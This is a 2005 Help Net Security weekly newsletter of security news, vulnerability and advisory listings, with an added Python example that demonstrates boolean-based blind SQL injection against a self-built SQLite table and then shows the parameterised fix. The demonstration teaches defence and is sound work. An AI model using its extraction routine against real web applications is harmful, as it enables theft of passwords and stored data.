HNS Newsletter
Issue 296 - 19.12.2005.
http://net-security.org

This is a newsletter delivered to you by Help Net Security. It
covers weekly roundups of security events that were in the
news the past week.

----------------------------------------------------------------
"How A Hacker Launches A Blind SQL Injection Attack Step-by-Step" WP
----------------------------------------------------------------
The newest web app vulnerability... Blind SQL Injection!
Even if your web application does not return error messages, it may
still be open to a Blind SQL Injection Attack. Blind SQL Injection can
deliver total control of your server to a hacker giving them the ability
to read, write and manipulate all data stored in your backend systems!
Download this *FREE* white paper from SPI Dynamics for a complete guide
to protection!
----------------------------------------------------------------
Download whitepaper from: http://www.net-security.org/v/spidyn2
----------------------------------------------------------------
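The point the white paper pitch makes is that an application which swallows database errors can still be made to answer yes/no questions, one per request, until the data is recovered. The following is an added example and is not code from SPI Dynamics or from the white paper: it builds a throwaway SQLite database with constructed rows, simulates a `view.php?id=` style lookup that splices the parameter into the query (the same pattern behind the many "id Variable SQL Injection" entries in the Vulnerabilities section of this issue), recovers a password using nothing but the page's "record found / not found" behaviour, and shows the parameterised lookup that closes the hole. The table, column and function names and the sample rows are assumptions chosen for the demonstration.

```python
"""Boolean-based blind SQL injection against a lookup that never shows
database errors, beside the parameterised fix.

Added example, not code from the advertised white paper.  The schema,
rows and function names are assumptions chosen for the demonstration."""
import sqlite3

# Constructed sample data: a minimal users table as a web app might have.
conn = sqlite3.connect(":memory:", check_same_thread=False)
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret"), (2, "guest", "guest")])

ADMIN_PW = "(SELECT password FROM users WHERE name = 'admin')"  # attacker's target


def vulnerable_lookup(user_id: str) -> bool:
    """Stands in for a page such as view.php?id=<user_id> that concatenates
    the parameter into SQL.  All it reveals is whether a record rendered;
    errors are swallowed, so error-based injection learns nothing."""
    sql = f"SELECT name FROM users WHERE id = {user_id}"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(user_id: str) -> bool:
    """Hardened form: validate the type and bind the value as a parameter.
    Injected text is then compared as data, never parsed as SQL."""
    try:
        row = conn.execute("SELECT name FROM users WHERE id = ?",
                           (int(user_id),)).fetchone()
    except (ValueError, sqlite3.Error):
        return False
    return row is not None


def oracle(condition: str) -> bool:
    """One yes/no question: a known-good id ANDed with the attacker's test.
    The record renders only when the condition holds."""
    return vulnerable_lookup(f"1 AND ({condition})")


def extract_length(max_len: int = 64) -> int:
    """Find the secret's length with at most max_len + 1 questions."""
    for n in range(max_len + 1):
        if oracle(f"length({ADMIN_PW}) = {n}"):
            return n
    raise RuntimeError("secret longer than max_len")


def extract_secret() -> str:
    """Recover the secret one character at a time; binary search over the
    printable ASCII range costs about seven questions per character."""
    secret = ""
    for pos in range(1, extract_length() + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({ADMIN_PW}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    print("vulnerable, id=1            :", vulnerable_lookup("1"))
    print("vulnerable, id=999 OR 1=1   :", vulnerable_lookup("999 OR 1=1"))
    print("blind extraction of password:", extract_secret())
    print("hardened, id=999 OR 1=1     :", safe_lookup("999 OR 1=1"))
```

Run as a script it prints the two lookups, the recovered string "s3cret", and the hardened lookup rejecting the injected id. Note that the vulnerable function never returns an error to the caller: the only signal the attacker uses is whether a row came back, which is exactly why suppressing error messages is not a fix. The hardened version fixes it by binding the value rather than hiding the symptom.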

Table of contents:

1) Security news
2) Vulnerabilities
3) Advisories
4) Articles
5) Software
6) Conferences
7) Security World
8) Virus News


[ Security news ]


----------------------------------------------------------------

MOBILITY DONE RIGHT - WITHOUT THE RISK
Mobility is having a profound impact on productivity within
organizations today. In a recent study, workers were found to be
13.4% more productive when using wireless devices.
http://www.net-security.org/news.php?id=9703


ZERO DAY EXCEL HACKER TAKES ON EBAY
But vulnerability author says he is still talking with Microsoft.
http://www.net-security.org/news.php?id=9704


ONLINE ANTI-PIRACY SERVICE CLOSES
A company that fought net piracy by adding fake files to file-sharing
networks is being closed down.
http://www.net-security.org/news.php?id=9705


SMALL SECURITY BUG IN FIREFOX, USERS UNSCATHED
History repeating.
http://www.net-security.org/news.php?id=9706


TWO-FACTOR CHECKS GIVE PCS EXTRA SECURITY LAYER
Pointsec Mobile Technologies will today release a new version of its
security tool for PCs.
http://www.net-security.org/news.php?id=9707


MICROSOFT TIGHTENING SECURITY DEFAULTS IN IE 7
Microsoft details changes aimed at reducing users' chances of falling
victim to malicious code.
http://www.net-security.org/news.php?id=9708


IT SECURITY LEADERS SET FOR KEY ROLES
IT security managers had better get ready to ditch their peripheral,
advisory role and get used to being the organisation’s key digital
security player.
http://www.net-security.org/news.php?id=9709


THE FIREFOX HACKS YOU MUST HAVE
With the release of the new version 1.5 of Firefox, there's never
been a better time to download the open-source browser, take it for a
drive, kick the tires and see what it can do.
http://www.net-security.org/news.php?id=9710


A FOOL'S CHOICE: FEATURES OR SECURITY IN WEB APPLICATIONS
Web applications that give customers, employees, and business
partners access to services and information are difficult to secure
and increasingly a soft target for hackers, who use a variety of
techniques to probe for sensitive data.
http://www.net-security.org/news.php?id=9711


PORT SCANS DON'T ALWAYS PRECEDE NETWORK HACKS
University of Maryland study finds most attacks are made without
them.
http://www.net-security.org/news.php?id=9712


SECURING SQL SERVERS USING GROUP POLICY
By implementing company policies and enforcing them through Active
Directory and Group Policy, you can literally affect thousands of
installations at once and enforce order from chaos.
http://www.net-security.org/news.php?id=9713


CYBERTHIEVES EXPLOIT CHRISTMAS SHIPPING DEADLINE
E-tailers have circled Tuesday on their calendars — and so have
cyberthieves.
http://www.net-security.org/news.php?id=9714


SECURITY BREACH AT SAM'S CLUB EXPOSES CREDIT CARD DATA
An unspecified number of consumers have been affected by the breach.
http://www.net-security.org/news.php?id=9715


SECURITY ASSESSMENT: HOW TO CRACK PASSWORDS
One of the key components in performing a security assessment is the
acquisition of user account information and cracking of the account
password. We show you some of the tools used to crack these
passwords.
http://www.net-security.org/news.php?id=9716


HACKER ATTACKS IN US LINKED TO CHINESE MILITARY
A systematic effort by hackers to penetrate US government and
industry computer networks stems most likely from the Chinese
military, the head of a leading security institute said.
http://www.net-security.org/news.php?id=9717


STORY OF A DUMB PATCH
This paper is an advisory but mostly it describes a mistake made by
Microsoft on patch MS05-018 where Microsoft failed to properly fix a
vulnerability having to release a new patch MS05-049.
http://www.net-security.org/news.php?id=9718


CISCO LAUNCHES PRACTICE LAB FOR CCIE
Cisco Systems today announced the launch of the CCIE (Cisco Certified
Internetwork Expert) Assessor Lab for Routing and Switching, the first
online CCIE practice lab exam offered by Cisco’s certification
program.
http://www.net-security.org/news.php?id=9719


SANS LOOKS TO SECURITY BY DEGREES
The SANS Institute has decided to go back to school.
http://www.net-security.org/news.php?id=9720


NEW ATTACK TARGETS KNOWN MOZILLA BUG
The exploit takes advantage of a known bug in the way that Firefox
processes Javascript.
http://www.net-security.org/news.php?id=9721


CONSORTIUM TAKES ON SECURITY ISSUES
Chief information security officers can have a difficult time
fighting for budget dollars, because detailing the business ROI of
buying a security product is far different from buying a Web portal.
http://www.net-security.org/news.php?id=9722


IDENTITY THEFT FEARS: UNDERREPORTED OR OVERBLOWN?
For every new incident of identity theft, data loss, or online fraud,
it seems as if a study has been commissioned to verify if this is a
first-class threat or an exaggerated nuisance.
http://www.net-security.org/news.php?id=9723


E-MAIL SPILLS CORPORATE SECRETS
Six percent of workers admitted that they've E-mailed confidential
company information to someone they shouldn't have.
http://www.net-security.org/news.php?id=9724


MOST STOLEN IDENTITIES NEVER USED
A new study suggests consumers whose credit cards are lost or stolen
or whose personal information is accidentally compromised face little
risk of becoming victims of identity theft.
http://www.net-security.org/news.php?id=9725


FIRMS COUNT THE COST OF SECURITY THREATS
Security threats soared during 2005, along with the risk of financial
losses, but a new report shows that companies still aren't heeding the
warnings.
http://www.net-security.org/news.php?id=9726


HACKERS BREAK INTO CHARITY WEBSITE
Charity Commission issues stark warning of increase in online fraud.
http://www.net-security.org/news.php?id=9727


DON'T OVERLOOK INTERNAL E-MAIL MONITORING
Keeping an eye on your people's E-mail can head off security and
compliance violations. Here are three ways you can make a difference
now.
http://www.net-security.org/news.php?id=9728


MICROSOFT PATCH TUESDAY BRINGS TWO BULLETINS
This month's Bulletins include security updates affecting Microsoft
Windows and Microsoft Internet Explorer.
http://www.net-security.org/news.php?id=9729


SECURITY ENHANCEMENTS IN OUTLOOK WEB ACCESS 2003
Outlook Web Access 2003 (OWA) is the web client delivered with
Microsoft Exchange Server 2003. As well as new end user functionality
features OWA 2003 delivers many enhancements that address common
security concerns.
http://www.net-security.org/news.php?id=9730


RESEARCHERS CRACK BIOMETRIC SECURITY WITH PLAY-DOH
"We have been saying for a long time that fingerprint readers can be
compromised by someone lifting live prints and creating false
fingers," said Avivah Litan, a Gartner analyst specializing in
security technologies.
http://www.net-security.org/news.php?id=9731


SYMANTEC LAUNCHES SECURITY APPLIANCES
The Gateway Security 5600's top-of-the-line model features throughput
of 3 Gbps and includes connectivity options for fiber and copper
Ethernet uplinks.
http://www.net-security.org/news.php?id=9732


MOBILE DATA SECURITY BOOSTED BY SELF-DESTRUCT TEXTS
A service offering secure self-destruct mobile text messages has been
launched in the UK.
http://www.net-security.org/news.php?id=9733


CREATING SECURE WIRELESS ACCESS POINTS WITH OPENBSD AND OPENVPN
You know how insecure 802.11x wireless networks are. In this article
we'll create an OpenBSD-based secure wireless access point that
prevents unauthorized access and encrypts every packet using a VPN
tunnel.
http://www.net-security.org/news.php?id=9734


ID FRAUDSTERS TARGET JOB CENTRE STAFF
Tax credit portal scam may hit 13,000.
http://www.net-security.org/news.php?id=9735


VMWARE'S SECURE BROWSER APPLIANCE
Threats like rootkits, spyware, adware, and viruses are simply cut
off.
http://www.net-security.org/news.php?id=9736


SECURITY A MONEY-MOTIVATED CONCERN IN 2005
Hackers working for cash emerged, employing quieter, more precise
techniques.
http://www.net-security.org/news.php?id=9737


SECURITY CHIEFS SHARE PAINS OF BEING CAUGHT IN THE MIDDLE
Corporate security experts face a crisis as they are caught between
regulators demanding better accountability for data security and the
need to keep businesses up and running with the help of many business
partners, an American Express security executive told Interop New York
attendees Tuesday.
http://www.net-security.org/news.php?id=9738


WHAT'S NEW IN MODSECURITY
This article describes the most important new features in ModSecurity
1.9.
http://www.net-security.org/news.php?id=9739


INTERNET SECURITY GONE WILD
"The real problem is the unspoken and unholy alliance between
Microsoft and other vendors not to stomp too hard on cookies so as
not to interfere with their customers," said Andrew Jaquith, senior
analyst at the Yankee Group.
http://www.net-security.org/news.php?id=9740


CONFESSIONS OF AN HONEST CRACKER
CyberMage cracks every game he plays. He also pays for every game he
cracks. Following his lead could spare honest people a lot of
aggravation, he says.
http://www.net-security.org/news.php?id=9741


DECLARATION OF RIGHTS FOR ADMINISTRATORS AND END USERS
Frustrated with having to deal with unwanted software being installed
on her network, an administrator suggests something be done about it.
http://www.net-security.org/news.php?id=9742


EMBEDDED SECURITY
This paper examines the benefits that TPM chips bring to
security-conscious businesses, and the ways in which this technology
can elevate trusted computing to higher levels, enhancing security
while simplifying usability.
http://www.net-security.org/news.php?id=9743


PRIVACY: THE DEVIL'S PLAYGROUND
The European Parliament adopted new rules drawn up by the European
Union to store phone and internet data for up to two years to fight
terrorism and other serious crime.
http://www.net-security.org/news.php?id=9744


BROWSER USERS URGED TO PATCH UP
Windows users are being warned about a bug that lets attackers take
over a PC via the Internet Explorer browser.
http://www.net-security.org/news.php?id=9745


SOBER WORM CRACKED
Finnish security firm says it has the solution.
http://www.net-security.org/news.php?id=9746


2005: A YEAR OF SECURITY WOES AND ACQUISITIONS
Computing rounds up the major events of the past year that have
shaped the IT industry in the UK, such as growing budgets and
government IT projects.
http://www.net-security.org/news.php?id=9747


UK SHOPKEEPERS BEATING ONLINE FRAUD
UK retailers are beating the problem of online fraud, according to a
new survey.
http://www.net-security.org/news.php?id=9748


WEB SERVICE SECURITY
This guide provides a scenario-driven approach to demonstrate where
different security patterns are successful, combined with a series of
decision matrices to assist you in applying your own criteria for
using Web service security patterns in your environment.
http://www.net-security.org/news.php?id=9749


SOFTWARE 'PIRATE' PLEADS GUILTY TO CHARGES
California man faces maximum sentence of 10 years in prison and
$500,000 fine.
http://www.net-security.org/news.php?id=9750


ADOBE MOVING TO MONTHLY SECURITY PATCH SCHEDULE
Customers have asked for a more predictable schedule.
http://www.net-security.org/news.php?id=9751


"DARK TRAFFIC" ZAPS 83 PERCENT OF E-MAIL RESOURCES
The amount of valid e-mail as a percentage of all incoming traffic
has declined sharply since the beginning of the year, a messaging
security vendor reported Tuesday, due to a tripling of directory
harvest attacks by spammers after addresses.
http://www.net-security.org/news.php?id=9752


MAC WORKSTATION SECURITY: MORE WAYS TO CLAMP DOWN ON THREATS
This article offers a look at additional ways to tighten security on
workstations, from disabling peer-to-peer sharing to limiting SSH
access and securing local NetInfo data.
http://www.net-security.org/news.php?id=9753


ATTACK OF THE 'ZOMBIES' (AND HOW TO RESPOND)
This webcast reviews next-generation bot features and
security-evasion techniques, and explores practical ways for
identifying them given their new level of sophistication.
http://www.net-security.org/news.php?id=9754


SECURITY STATUS RISES
New research from The International Information Security
Certification Consortium (ISC2) shows that IT security professionals
are boosting their profile in the boardroom.
http://www.net-security.org/news.php?id=9755


TOTALLY SECURE CLASSICAL COMMUNICATIONS?
How would you feel if you invested millions of dollars in quantum
cryptography, and then learned that you could do the same thing with
a few 25-cent Radio Shack components?
http://www.net-security.org/news.php?id=9756


ITEM-LEVEL RFID TAGGING AIMS TO CURTAIL COUNTERFEITING
Vue Technology and Symbol Technologies Inc. on Wednesday said they
will jointly develop and offer an item-level radio frequency
identification (RFID) software and hardware package for retailers and
manufacturers.
http://www.net-security.org/news.php?id=9757


DUTCH HACKING GROUP CRACKS XBOX 360
Team PI Coder claims to have penetrated new console's security
systems.
http://www.net-security.org/news.php?id=9758


SURVIVOR'S GUIDE TO 2006: SECURITY
As you prepare for 2006, you need compliance-driven products to
ensure your company doesn't become the next security-breach headline.
But don't be fooled by all the vendor hype.
http://www.net-security.org/news.php?id=9759


WINDOWS XP GETS SECURITY CERTIFICATION
Touting the success of its new Security Development Lifecycle (SDL)
process, Microsoft late Wednesday said Windows Server 2003 and
Windows XP SP2 Professional and Embedded have secured the highest
Common Criteria security certification from the United States
government's National Information Assurance Partnership.
http://www.net-security.org/news.php?id=9760


MOBILE DEVICES USERS NEED STRONGER SECURITY
Encryption is becoming increasingly important, according to a panel
at this week's Interop trade show.
http://www.net-security.org/news.php?id=9761


TIME TO COME CLEAN ABOUT HACKING
Companies need to pool information about web-based attacks to keep
online buyers safe and spending.
http://www.net-security.org/news.php?id=9762


THE ENEMY WITHIN
Geeks, squatters and saboteurs threaten corporate security.
http://www.net-security.org/news.php?id=9763


WEB, SECURITY, WIRELESS TECHNOLOGIES RIVET CIOS
A newly released survey of CIOs confirmed that Web issues and
security, followed by wireless technologies, have held on to their
positions as the leading technologies that concern federal IT
professionals.
http://www.net-security.org/news.php?id=9764


NEW MALWARE TARGETS MICROSOFT USERS
Two variants of the exploit are now in circulation.
http://www.net-security.org/news.php?id=9765


HONEYPOTS AS AN EARLY WARNING SYSTEM
These sticky traps make a good backup plan for malware detection -
and every enterprise should have at least one.
http://www.net-security.org/news.php?id=9766


P-TO-P VIDEO AND MUSIC DOWNLOAD SECURITY THREAT
A series of files are being circulated across the Internet at
peer-to-peer networks that allegedly contain music and videos, but
also include adware in the form of a "toolbar," a security vendor
says.
http://www.net-security.org/news.php?id=9767

----------------------------------------------------------------




[ Vulnerabilities ]


All vulnerabilities are located here:
http://www.net-security.org/vulnerabilities.php
----------------------------------------------------------------

PHP Support Tickets index.php Multiple Field SQL Injection
http://www.net-security.org/vulnerability.php?id=21730


Zaygo Multiple Cart zaygo.cgi root Variable XSS
http://www.net-security.org/vulnerability.php?id=21729


PDEstore pdestore.cgi Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21727


Ad Manager Pro advertiser_statistic.php ad_number Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21709


Plogger index.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21710


Plogger index.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21711


PlexCart X3 Product Search Module SQL Injection
http://www.net-security.org/vulnerability.php?id=21712


WHMCompleteSolution knowledgebase.php search Variable XSS
http://www.net-security.org/vulnerability.php?id=21697


phpCOIN db.php _CCFG[_PKG_PATH_DBSE] Remote File Inclusion
http://www.net-security.org/vulnerability.php?id=21724


phpCOIN Cookie Data SQL Injection
http://www.net-security.org/vulnerability.php?id=21725


phpCOIN config.php Direct Request Path Disclosure
http://www.net-security.org/vulnerability.php?id=21726


VCD-db search.php by Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21699


VCD-db Search Module batch Variable XSS
http://www.net-security.org/vulnerability.php?id=21700


mcGalleryPRO index.php language Variable Local File Inclusion
http://www.net-security.org/vulnerability.php?id=21718


mcGalleryPRO show.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21719


mcGalleryPRO index.php album Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21720


mcGalleryPRO Search Module XSS
http://www.net-security.org/vulnerability.php?id=21721


Snipe Gallery view.php gallery_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21693


Snipe Gallery image.php image_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21694


Snipe Gallery search.php keyword Variable XSS
http://www.net-security.org/vulnerability.php?id=21695


PhpWebGallery comments.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21689


PhpWebGallery category.php search Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21690


PhpWebGallery picture.php image_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21691


Dream Poll view_Results.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21688


Jamit Job Board index.php cat Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21687


MySQL Auction Search Module keyword XSS
http://www.net-security.org/vulnerability.php?id=21685


QuickPayPro popups.edit.php popupid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21676


QuickPayPro customer.tickets.view.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21677


QuickPayPro subscribers.tracking.edit.php subtrackingid Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21678


QuickPayPro design.php delete Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21679


QuickPayPro tracking.details.php trackingid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21680


QuickPayPro sales.view.php customerid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21681


QuickPayPro subscribers.tracking.add.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21682


QuickPayPro tickets.add.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21683


QuickPayPro categories.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21684


Utopia News Pro editnews.php newsid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21645


Utopia News Pro faq.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21646


Utopia News Pro postnews.php poster Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21647


Utopia News Pro templates.php tempid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21648


Utopia News Pro users.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21649


phpWebThings download.php ref Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21650


phpWebThings forum.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21651


phpWebThings forum_edit.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21652


phpWebThings forum_write.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21653


phpWebThings guestbook.php tekst Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21654


phpWebThings index.php menuoption Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21655


phpWebThings myaccount.php sel_avatar Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21656


e107 signup.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21657


e107 subcontent.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21658


e107 upload.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21659


e107 usersettings.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21660


myBloggie add.php category Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21661


myBloggie addcat.php cat_desc Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21662


myBloggie adduser.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21663


myBloggie del.php post_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21664


myBloggie delcat.php cat_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21665


myBloggie delcomment.php comment_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21666


myBloggie deluser.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21667


myBloggie edit.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21668


myBloggie editcat.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21669


myBloggie edituser.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21670


EveryAuction auction.pl searchstring Variable XSS
http://www.net-security.org/vulnerability.php?id=21674


Arab Portal link.php PHPSESSID Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21672


ASP-DEv XM Forum forum.asp forum_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21706


ASP-DEv XM Forum register.asp SQL Injection
http://www.net-security.org/vulnerability.php?id=21707


ASP-DEv XM Forum search.asp Search For SQL Injection
http://www.net-security.org/vulnerability.php?id=21708


Opera Bookmarked Page Title Overflow DoS
http://www.net-security.org/vulnerability.php?id=21641


Horde Kronolith Calendar Multiple Field XSS
http://www.net-security.org/vulnerability.php?id=21608


Horde Kronolith Calendar Event Manipulation XSS
http://www.net-security.org/vulnerability.php?id=21609


Horde Kronolith Calendar Search Function Multiple Method XSS
http://www.net-security.org/vulnerability.php?id=21610


Horde Kronolith Calendar Edit Permission Function XSS
http://www.net-security.org/vulnerability.php?id=21611


Scout Portal Toolkit SPT--Home.php ResourceOffset Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21625


Scout Portal Toolkit SPT--UserLogin.php Multiple Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21626


Scout Portal Toolkit SPT--BrowseResources.php ParentId Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21627


Scout Portal Toolkit SPT--FullRecord.php ResourceId Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21628


Scout Portal Toolkit SPT--BrowseResources.php ParentId Variable XSS
http://www.net-security.org/vulnerability.php?id=21630


Scout Portal Toolkit SPT--Advanced.php Multiple Field XSS
http://www.net-security.org/vulnerability.php?id=21631


Scout Portal Toolkit SPT--FullRecord.php ResourceId Variable XSS
http://www.net-security.org/vulnerability.php?id=21632


Scout Portal Toolkit SPT--Home.php ResourceOffset Variable XSS
http://www.net-security.org/vulnerability.php?id=21633


Scout Portal Toolkit SPT--UserLogin.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21634


Scout Portal Toolkit SPT--AdvancedSearch.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21635


Scout Portal Toolkit SPT--QuickSearch.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21636


Netref index.php cat Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21623


MyBulletinBoard (MyBB) Unspecified SQL Injection
http://www.net-security.org/vulnerability.php?id=21600


MyBulletinBoard (MyBB) Unspecified Issue
http://www.net-security.org/vulnerability.php?id=21601

----------------------------------------------------------------




[ Advisories ]


All advisories are located at:
http://www.net-security.org/archive_advi.php
----------------------------------------------------------------

SCO Security Advisory - OpenServer 6.0.0 : Tcpdump Denial of Service
(SCOSA-2005.61)
http://www.net-security.org/advisory.php?id=5720


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Tcpdump
Denial of Service (SCOSA-2005.60)
http://www.net-security.org/advisory.php?id=5719


SCO Security Advisory - OpenServer 5.0.7 OpenServer 6.0.0 : Gzip
Multiple Vulnerabilities (SCOSA-2005.59)
http://www.net-security.org/advisory.php?id=5718


SCO Security Advisory - UnixWare 7.1.4 : Gzip Multiple
Vulnerabilities (SCOSA-2005.58)
http://www.net-security.org/advisory.php?id=5717


SUSE Security Announcement - SUSE Security Summary Report
(SUSE-SR:2005:030)
http://www.net-security.org/advisory.php?id=5716


Microsoft Security Bulletin - Summary for December 2005
http://www.net-security.org/advisory.php?id=5715


Mandriva Linux Security Update Advisory - ffmpeg (MDKSA-2005:231)
http://www.net-security.org/advisory.php?id=5714


Mandriva Linux Security Update Advisory - mplayer (MDKSA-2005:230)
http://www.net-security.org/advisory.php?id=5713


Mandriva Linux Security Update Advisory - gstreamer-ffmpeg
(MDKSA-2005:232)
http://www.net-security.org/advisory.php?id=5712


Mandriva Linux Security Update Advisory - xmovie (MDKSA-2005:229)
http://www.net-security.org/advisory.php?id=5711


Mandriva Linux Security Update Advisory - xine-lib (MDKSA-2005:228)
http://www.net-security.org/advisory.php?id=5710


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : LibXpm
Integer Overflow Vulnerability (SCOSA-2005.57)
http://www.net-security.org/advisory.php?id=5709


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Xloadimage
NIFF Image Title Handling Buffer Overflow Vulnerability
(SCOSA-2005.56)
http://www.net-security.org/advisory.php?id=5708


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Xloadimage
NIFF Image Title Handling Buffer Overflow Vulnerability
(SCOSA-2005.56)
http://www.net-security.org/advisory.php?id=5707


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Lynx Command
Injection Vulnerability (SCOSA-2005.55)
http://www.net-security.org/advisory.php?id=5706


Mandriva Linux Security Update Advisory - ethereal (MDKSA-2005:227)
http://www.net-security.org/advisory.php?id=5705


Debian Security Advisory - kernel-source-2.4.27 (DSA 922-1)
http://www.net-security.org/advisory.php?id=5704


OpenPKG Security Advisory - apache2 vulnerability
(OpenPKG-SA-2005.029)
http://www.net-security.org/advisory.php?id=5703


Debian Security Advisory - kernel-source-2.4.27 (DSA 921-1)
http://www.net-security.org/advisory.php?id=5702


SUSE Security Announcement - php4,php5 (SUSE-SA:2005:069)
http://www.net-security.org/advisory.php?id=5701


SUSE Security Announcement - kernel, perl (SUSE-SA:2005:068)
http://www.net-security.org/advisory.php?id=5700


US-CERT Technical Cyber Security Alert - Microsoft Internet Explorer
Vulnerabilities (TA05-347A)
http://www.net-security.org/advisory.php?id=5699


Ubuntu Security Notice - zope2.8 vulnerability (USN-229-1)
http://www.net-security.org/advisory.php?id=5698


Debian Security Advisory - ethereal (DSA 920-1)
http://www.net-security.org/advisory.php?id=5697


Mandriva Linux Security Update Advisory - mozilla-thunderbird
(MDKSA-2005:226)
http://www.net-security.org/advisory.php?id=5696


Ubuntu Security Notice - curl vulnerability (USN-228-1)
http://www.net-security.org/advisory.php?id=5695


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : uidadmin
Buffer Overflow Vulnerability (SCOSA-2005.54)
http://www.net-security.org/advisory.php?id=5694


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : OpenSSH
Multiple Vulnerabilities (SCOSA-2005.53)
http://www.net-security.org/advisory.php?id=5693


Ubuntu Security Notice - perl vulnerability (USN-222-2)
http://www.net-security.org/advisory.php?id=5692


Ubuntu Security Notice - xpdf/cupsys/tetex-bin/kdegraphics/koffice
vulnerabilities (USN-227-1)
http://www.net-security.org/advisory.php?id=5691


Debian Security Advisory - curl (DSA 919-1)
http://www.net-security.org/advisory.php?id=5690

----------------------------------------------------------------




[ Articles ]


All articles are located at:
http://www.net-security.org/articles_main.php

Articles can be contributed to articles@net-security.org


----------------------------------------------------------------

DECLARATION OF RIGHTS FOR ADMINISTRATORS AND END USERS
Frustrated with having to deal with unwanted software being installed
on her network, an administrator suggests something be done about it.
http://www.net-security.org/article.php?id=881


MICROSOFT PATCH TUESDAY BRINGS TWO BULLETINS
December's update is not much different than last month's update
since Microsoft released two bulletins.
http://www.net-security.org/article.php?id=880

----------------------------------------------------------------




[ Software ]


Windows software is located at:
http://net-security.org/software_main.php?cat=1

Linux software is located at:
http://net-security.org/software_main.php?cat=2

Pocket PC software is located at:
http://net-security.org/software_main.php?cat=3

Mac OS X software is located at:
http://net-security.org/software_main.php?cat=5


----------------------------------------------------------------

GPGEE 1.2.3 (Windows)
GPGee is a shell extension for Windows Explorer that acts as an
assistant for using GNU Privacy Guard (GnuPG/GPG).
http://www.net-security.org/software.php?id=642


IKNOW PROCESS SCANNER 1.0.1 (Windows)
Tool for getting information on the processes running on your Windows
machine.
http://www.net-security.org/software.php?id=644


IRC DEFENDER 1.4b1 (Linux)
IRC Defender is a Perl program for protecting your IRC network
against virus drones, general troublemakers, ban evasion, and
attacks.
http://www.net-security.org/software.php?id=219


KMYFIREWALL 1.0 (Linux)
KMyFirewall is a KDE/Qt program that tries to provide an easy-to-use
and comfortable GUI for the Linux 2.4 "iptables" command.
http://www.net-security.org/software.php?id=137


LINUX-VSERVER 2.01 (Linux)
A system for running general purpose virtual servers on one box at
full speed.
http://www.net-security.org/software.php?id=527


